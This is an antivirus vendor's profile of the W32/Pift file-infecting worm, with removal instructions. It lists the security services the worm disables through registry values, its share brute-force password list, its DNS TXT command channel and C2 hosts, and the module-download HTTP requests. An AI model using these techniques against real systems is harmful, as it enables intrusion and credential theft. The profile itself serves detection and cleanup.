For Home

Virus Profile: W32/Pift

Threat Search
Print
   
Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 7/19/2012
Date Added: 7/19/2012
Origin: N/A
Length: N/A
Type: Internet Worm
Subtype: Win32
DAT Required: 6612
Removal Instructions
   
 
 
   

Description

W32/Pift will infect executable files on local, removable and remote shared drives. The virus simply writes its code to the end of the last section of the host PE file and redirects the entry point RVA to point to its own EP.

In addition to infecting local, removable and remotely shared executable files, W32/Pift will purposely search for executable files to infect.

Aliases

  • Microsoft  -  Virus: Win32/Serpip.A
  • Kaspersky -  Virus.Win32.Suspic.gen
  • AVG   - Win32/Heur
  • Trend Micro  - PE_MUSTAN.A

Indication of Infection

Presence of above mentioned files and registry keys

Presence unexpected network connection to the above mentioned IP Address.

Methods of Infection

W32/Pift will infect executable files on local, removable and remote shared drives. The virus simply writes its code to the end of the last section of the host PE file and redirects the entry point RVA to point to its own EP.

In addition to infecting local, removable and remotely shared executable files, W32/Pift will purposely search for executable files to infect.

   

Virus Characteristics

Upon execution, the virus modifies executable files present on the system, by adding its viral code to the end of last section, then pointing the entry point to the start of this added code.

The virus also adds a marker to the file header to prevent reinfection:

It also drops the following file, which are used as restart mechanism for the virus in case infected files are cleaned:

  •  %System32%\wmicuclt.exe
  •  %System32%\wmicuclt

Some of the newly created registry values are:

  •  HKLM\SYSTEM\ControlSet001\Services\360rp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\a2AntiMalware\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\amsp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AntiVirService\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\avast! Antivirus\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AVGIDSAgent\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\AVGwd\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\avp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\ekrn\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\F-Secure Gatekeeper Handler Starter\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\FSMA\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\FSORSPClient\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\kxesapp\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\kxescore\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\mcods\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\MsMpSvc\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\Mcshield\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\NIS\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\PavFnSvr\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\pavsrv\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\RsRavMon\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\SavService\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet001\Services\V3 Service\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet002\Services\vsserv\
    Start: 0x00000004
  •  HKLM\SYSTEM\ControlSet002\Services\zhudongfangyu\
    Start: 0x00000004

By adding these values malware makes sure that these services will not be started under any condition.

Malware also adds the following keys to store its data:

  •  HKLM\SYSTEM\Select\v
  •  HKLM\SYSTEM\Select\ext
  •  HKLM\SYSTEM\Select\plg
  •  HKLM\SYSTEM\Select\pu
  •  HKLM\SYSTEM\Select\p

The key value “v” contains complete virus code. The other keys store downloaded modules and stolen passwords

It also adds a key:

  • HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wmicucltsvc

So that the malware can run in safe mode also.

It also adds the malicious threads into the following processes:

  • Svchost.exe
  • Lsass.exe

These threads are responsible for all the virus operation and also for restarting the malware after reboot.

In memory it has the following strings to brute force remote shares credentials:

  • Admim
  • Password
  • User
  • Server
  • Testl
  • Rockyou
  • Letmein
  • Secret
  • Ilovec
  • Computp
  • Root
  • Princess
  • Dragon
  • PASSWORD
  • Woaini
  • Wojia
  • Database
  • Oracle
  • 123qwe
  • Internetd
  • Asd
  • Ihavenol
  • Godblesslk
  • Enable
  • 23abc
  • 007
  • Alpha
  • Patrick
  • Istratoyrx
  • Foobar
  • Temp
  • Asdf
  • Yxcv
  • Home
  • Xxx
  • Owner
  • Login
  • Pwd
  • Mypc
  • Pwv
  • Pussy
  • 69d
  • Mustang
  • Ball
  • Masdy
  • Michaelm
  • Shadow
  • Monkey
  • Fuckme
  • Jordan
  • Harley
  • Ranger
  • Iwantu
  • Jennifer
  • Hup-
  • Batman
  • Trustno1
  • Thomas
  • Tigx
  • Robert
  • Kill}
  • P@ssW0rd
  • Soft
  • Assb
  • 123x

The malware uses DNS as its command and control channel. In order to receive commands it queries the TXT record for some domains. The authoritative DNS server for these domains will reply with a base64 encoded TXT record with the commands to perform. The response may look like this:

  • e.ppift.net     text =    "p666666666666666666666666666666666666666667666664kYa7kRaD4FcF!RX7MRCu9WO66666666p6666T66666CD6JaDxZXekFC8!PC9NyUD2J666666666666666666666666666666666666666666666666666"

It connects to the following URLs and address. The instructions contain additional URLs to possibly download other malicious files:

  •  e.ppift.in
  •  e.ppift.com
  •  e.ppift.net
  •  ns1.ppns.info
  •  ns2.ppns.info
  •  ns3.ppns.info
  •  ns4.ppns.info
  •  206.137.17.89
  •  199.182.233.17
  •  110.45.151.19

Once malware gets a response from DNS server, it will perform an HTTP request to download more files to the machine. I observed the following request:

  • GET /plg3.z HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0
    Connection: Close
    Host: d.ppns.info
  • GET /ext1.z HTTP/1.0
    Accept: */*
    User-Agent: Mozilla/4.0
    Connection: Close
    Host: d.ppns.info

The two files above were observed being downloaded by the virus. They contain modules that work only inside the virus in memory, and may contain any kind of code. The current modules being downloaded appear to be backdoor and password stealers. They are not standalone executable, but partial code that is loaded by the malware from the registry when necessary.

It then starts to scan the local network for open shares to infect files remotely (Port 137)

   

All Users:

Please use the following instructions for all supported versions of Windows to remove threats and other potential risks:

1.Disable System Restore .

2.Update to current engine and DAT files for detection and removal.

3.Run a complete system scan.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

1. Please go to the Microsoft Recovery Console and restore a clean MBR.

On windows XP:

Insert the Windows XP CD into the CD-ROM drive and restart the computer.
When the "Welcome to Setup" screen appears, press R to start the Recovery Console.
Select the Windows installation that is compromised and provide the administrator password
Issue 'fixmbr' command to restore the Master Boot Record
Follow onscreen instructions
Reset and remove the CD from CD-ROM drive.


On Windows Vista and 7:

Insert the Windows CD into the CD-ROM drive and restart the computer.
Click on "Repair Your Computer"
When the System Recovery Options dialog comes up, choose the Command Prompt.
Issue 'bootrec /fixmbr' command to restore the Master Boot Record
Follow onscreen instructions
Reset and remove the CD from CD-ROM drive.